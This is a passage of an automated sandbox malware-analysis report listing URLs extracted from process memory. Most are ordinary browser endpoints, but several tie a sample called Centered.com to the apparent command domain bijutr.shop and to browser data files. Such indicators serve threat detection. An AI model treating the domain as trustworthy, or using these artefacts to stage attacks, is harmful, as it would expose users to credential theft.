                Source: chrome.exe, 00000015.00000003.1810575976.000036EC010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891087879.000036EC00D98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002F7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812347913.000036EC00A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810894201.000036EC010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810519278.000036EC0109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810791157.000036EC010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812330053.000036EC00CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810832476.000036EC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812535851.000036EC00F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812369339.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chrome.exe, 00000015.00000003.1810575976.000036EC010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891087879.000036EC00D98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002F7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812347913.000036EC00A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810894201.000036EC010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810519278.000036EC0109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810791157.000036EC010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812330053.000036EC00CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810832476.000036EC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812535851.000036EC00F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812369339.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: chrome.exe, 00000015.00000002.1891912759.000036EC00E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
                Source: chrome.exe, 00000015.00000002.1889610509.000036EC009E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: chrome.exe, 00000015.00000002.1889497169.000036EC009B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
                Source: Centered.com, 00000010.00000000.1274462155.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp, Dumb.0.dr, Centered.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: din.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                Source: chrome.exe, 00000015.00000002.1889789717.000036EC00A58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
                Source: chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmp, XTRIWB.16.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                Source: chrome.exe, 00000015.00000002.1885904115.000036EC0008C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
                Source: chrome.exe, 00000015.00000002.1887387305.000036EC00418000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                Source: chrome.exe, 00000015.00000002.1885705642.000036EC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                Source: chrome.exe, 00000015.00000003.1834090131.000036EC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                Source: chrome.exe, 00000015.00000003.1834090131.000036EC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                Source: chrome.exe, 00000015.00000003.1834090131.000036EC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
                Source: chrome.exe, 00000015.00000002.1885983831.000036EC000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
                Source: chrome.exe, 00000015.00000002.1885983831.000036EC000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
                Source: chrome.exe, 00000015.00000002.1885983831.000036EC000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
                Source: chrome.exe, 00000015.00000002.1885904115.000036EC0008C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                Source: chrome.exe, 00000015.00000002.1886652713.000036EC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                Source: chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: msedge.exe, 0000001A.00000003.1959048170.00000180E7BBE000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001A.00000002.2010754986.00000180E7BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                Source: 86911717-b4b7-493b-81e2-698d6cc9ccc4.tmp.29.drString found in binary or memory: https://assets.msn.com
                Source: Centered.com, 00000010.00000002.2505513959.0000000004A0D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/$
                Source: Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/%
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/)#
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/-end-point:
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/.
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop//
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/6
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/R
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/b
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/op
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/op-
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/w
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopE3OHVAS0--ing
                Source: Centered.com, 00000010.00000002.2505513959.0000000004A9D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopECJMGD
                Source: Centered.com, 00000010.00000002.2505513959.0000000004A9D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopIE3W4EU
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopS0ZU37
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B5F000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopUAS0ZU37--
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopUKXLFU
                Source: Centered.com, 00000010.00000002.2505513959.0000000004A9D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopppData
                Source: Centered.com, 00000010.00000002.2505513959.0000000004A3C000.00000040.00001000.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2505513959.0000000004A9D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopsh;
                Source: Centered.com, 00000010.00000002.2511212065.0000000006CFA000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Z58QQQ.16.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                Source: Centered.com, 00000010.00000002.2511212065.0000000006CFA000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Z58QQQ.16.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                Source: Reporting and NEL.29.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                Source: chrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887635623.000036EC004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891145184.000036EC00DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                Source: chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico800106
                Source: offscreendocument_main.js.28.dr, service_worker_bin_prod.js.28.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
                Source: chrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                Source: chrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                Source: Centered.com, 00000010.00000002.2511212065.0000000006B2B000.00000004.00000800.00020000.00000000.sdmp, Web Data.28.dr, XTRIWB.16.dr, 3OHLNY.16.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: chrome.exe, 00000015.00000003.1864432905.000036EC00C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                Source: chrome.exe, 00000015.00000002.1890412622.000036EC00C28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1860635165.000036EC00C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1864432905.000036EC00C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                Source: chrome.exe, 00000015.00000002.1890412622.000036EC00C28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1860635165.000036EC00C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1864432905.000036EC00C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                Source: chrome.exe, 00000015.00000002.1889610509.000036EC009E8000.00000004.00000800.00020000.00000000.sdmp, Web Data.28.dr, XTRIWB.16.dr, 3OHLNY.16.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000002.2013516926.000033FC0018C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                Source: manifest.json.28.drString found in binary or memory: https://chrome.google.com/webstore/
                Source: chrome.exe, 00000015.00000002.1888166681.000036EC00674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                Source: chrome.exe, 00000015.00000002.1888166681.000036EC00674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore760oYJqs=
                Source: chrome.exe, 00000015.00000002.1893748702.000036EC01218000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1856113571.000036EC0121C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1889497169.000036EC009B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1835607263.000036EC01218000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1889667260.000036EC00A18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890323155.000036EC00BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: chrome.exe, 00000015.00000002.1893748702.000036EC01218000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1856113571.000036EC0121C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1835607263.000036EC01218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en6
                Source: chrome.exe, 00000015.00000003.1809015883.000036EC00CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813504638.000036EC00394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812756724.000036EC00E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1815011831.000036EC00CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813667267.000036EC00E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                Source: msedge.exe, 0000001A.00000002.2013516926.000033FC0018C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorekgejglhpjiefppelpmljglcjbhoiplfn3
                Source: chrome.exe, 00000015.00000003.1801618856.00005938006B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
